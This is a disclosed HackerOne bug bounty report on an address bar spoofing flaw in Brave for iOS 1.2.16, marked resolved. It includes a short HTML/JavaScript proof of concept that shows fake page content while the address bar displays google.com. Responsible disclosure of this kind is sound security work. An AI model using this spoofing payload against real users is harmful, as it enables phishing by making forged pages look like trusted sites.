[ios] Address bar spoofing in Brave for iOS

Disclosed: 2016-10-25 21:40:42 By ibram To brave
Low
Vulnerability Details
Hey ## Summary: I've found an address bar spoofing vulnerability in the latest version of Brave for iOS. ## Products affected: Brave for iOS 1.2.16 *(Android maybe?)* ## PoC: ```html <script> var spoof = function(){ document.write("<h1>This is not Google</h1>"); document.location = "https://google.com:1234"; setInterval(function(){document.location="https://google.com:1234";},9800); }; </script> <input type="button" value="Spoof" onclick="spoof();" /> ``` ## Supporting Material/References: {F128949} Regards, Ibram
Actions
View on HackerOne
Report Stats
  • Report ID: 176929
  • State: Closed
  • Substate: resolved
  • Upvotes: 13
Share this report